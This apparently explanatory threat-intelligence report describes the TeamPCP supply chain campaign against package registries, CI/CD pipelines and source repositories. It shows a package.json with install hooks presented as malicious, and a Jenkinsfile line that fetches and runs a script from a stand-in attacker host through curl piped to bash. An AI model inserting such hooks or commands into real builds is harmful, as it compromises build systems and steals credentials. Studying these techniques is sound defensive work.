TeamPCP: A Multi-Stage Supply Chain Attack Campaign Targeting Development Tools
The TeamPCP campaign represents a sophisticated, multi-stage supply chain attack meticulously engineered to compromise software development environments. This operation distinguishes itself through its targeted exploitation of prevalent development tooling, including public package registries, integrated development environments (IDEs), and continuous integration/continuous deployment (CI/CD) pipelines. Initial intelligence indicates the primary objective of TeamPCP is intellectual property theft and the insertion of persistent backdoors into legitimate software products prior to their distribution.
Initial Infiltration: Malicious Package Injection & Dependency Confusion
The initial vector for TeamPCP typically leverages a combination of typosquatting and dependency confusion techniques against popular package managers such as npm and PyPI. Attackers publish malicious packages with names closely resembling legitimate, widely used internal or public libraries. Developers, through misconfigurations in their package manager resolvers or simple typographical errors, inadvertently pull these malicious packages into their build dependencies. For instance, a common tactic observed is the registration of packages like @organization/internal-lib or private-utility-py on public registries, aiming to exploit resolver precedence or misconfigurations in .npmrc or pip.conf files.
One notable technique observed involves leveraging a vulnerability similar to the dependency confusion identified in various ecosystems, for example, the class of issues leading to disclosures like CVE-2021-23351. In TeamPCP, attackers would publish a package named internal-logger to npm, knowing a target organization internally uses a private package of the same name. If the organization's npm configuration does not explicitly prioritize their private registry, the public, malicious package could be fetched instead. Once executed, these malicious packages often deploy an initial stage loader, typically a JavaScript or Python script designed for reconnaissance and establishing command and control (C2) communications. This loader often enumerates environment variables, developer credentials, and sensitive configuration files.
A hypothetical malicious package.json snippet exhibiting pre-install or post-install script execution capabilities:
{
"name": "internal-logger",
"version": "1.0.0",
"description": "Internal logging utility",
"main": "index.js",
"scripts": {
"preinstall": "node preinstall.js",
"postinstall": "node postinstall.js"
},
"author": "Malicious Actor",
"license": "MIT"
}
The preinstall.js or postinstall.js script would contain obfuscated code to collect system information and establish an encrypted C2 channel. Data exfiltration often occurs over DNS or HTTPS to attacker-controlled domains, mimicking legitimate network traffic.
Command and Control (C2) & Persistence: Exploiting Build Systems
Following initial compromise, TeamPCP pivots its attention to compromising CI/CD infrastructure. Attackers prioritize gaining access to build servers, pipeline configurations, and artifact repositories. This stage is critical for achieving persistent access within the development lifecycle and injecting malicious payloads directly into compiled artifacts. Vulnerabilities in CI/CD platforms are frequently exploited. For instance, Remote Code Execution (RCE) vulnerabilities in Jenkins, such as CVE-2024-23897, have been observed as potential entry points for TeamPCP operators to gain full control over build agents. This CVE, affecting Jenkins through its command line interface (CLI), allows for arbitrary file reading and, under specific conditions, RCE by reading binary files with specific data sequences. Exploitation of such a vulnerability grants attackers the ability to:
- Modify Jenkins pipeline scripts (e.g.,
Jenkinsfile). - Inject malicious build steps or post-build actions.
- Access and steal credentials stored within Jenkins, including those for source code management (SCM) systems and artifact repositories.
- Deploy persistent backdoors directly onto build agent machines.
A modified Jenkinsfile snippet demonstrating a potential injection point for malicious code:
pipeline {
agent any
stages {
stage('Build') {
steps {
script {
sh 'npm install'
sh 'npm run build'
// <-- TeamPCP Malicious Injection Start -->
sh 'curl -s https://attacker.com/malicious_post_build.sh | bash'
// <-- TeamPCP Malicious Injection End -->
}
}
}
stage('Test') {
steps {
sh 'npm test'
}
}
}
}
The injected curl command fetches and executes a script from an attacker-controlled domain, enabling arbitrary actions on the build agent, from credential exfiltration to direct modification of compiled binaries.
Lateral Movement & Payload Delivery: Targeting SCM and Artifact Repositories
With control over CI/CD systems, TeamPCP escalates its privileges to access and manipulate source code repositories (e.g., GitHub, GitLab) and artifact storage (e.g., Nexus, Artifactory). Stolen SCM credentials allow for direct modification of application source code, enabling the injection of subtle backdoors that are difficult to detect during code reviews. These backdoors are often designed to be dormant until specific conditions are met, such as deployment to production environments or execution on machines with certain IP ranges. Attackers leverage their access to:
- Commit Malicious Code: Directly introduce code changes to stable branches, bypassing typical pull request and code review processes, especially if they have compromised administrative SCM accounts.
- Tamper with Build Artifacts: Modify compiled binaries or package bundles stored in artifact repositories. This often involves injecting trojanized modules or altering existing executables to include hidden functionalities.
- Harvest Developer Credentials: Further expand their foothold by continuously monitoring SCM and CI/CD systems for new credentials, API tokens, and secrets.
The final payload delivery often manifests as a small, highly obfuscated module embedded within a critical component of the targeted application. This module typically facilitates persistent remote access, data exfiltration, or further supply chain compromises downstream by infecting dependent applications. TeamPCP prioritizes stealth, employing techniques such as code signing abuse, polymorphism, and anti-analysis checks to evade detection by security solutions.
Affected Components and Attack Vectors (Illustrative):
| Component | TeamPCP Attack Vector | Example CVE/Technique | Observed Impact |
|---|---|---|---|
| Package Managers (npm, PyPI) | Dependency Confusion, Typosquatting | CVE-2021-23351 (Dependency Confusion) | Initial code execution on developer workstations and build agents. |
| CI/CD Platforms (Jenkins, GitLab CI) | RCE, Credential Theft, Pipeline Modification | CVE-2024-23897 (Jenkins RCE) | Full control over build processes, source code and artifact tampering. |
| Source Code Management (GitHub, GitLab) | Stolen Credentials, Repository Tampering | Compromised personal access tokens/SSH keys | Direct injection of backdoors into application source code. |
| Artifact Repositories (Nexus, Artifactory) | Tampered Artifact Uploads, Credential Theft | Weak authentication, API key exposure | Distribution of trojanized software to customers. |
| Developer Workstations (VS Code, IntelliJ) | Malicious Extensions, Environment Variable Exfiltration | Phishing, social engineering to install malicious extensions | Credential theft, reconnaissance, persistent access to dev environment. |
The long-term strategy of TeamPCP appears to be establishing deeply embedded, resilient footholds within targeted software supply chains, enabling sustained intelligence gathering and the potential for disruptive operations against downstream consumers of compromised software.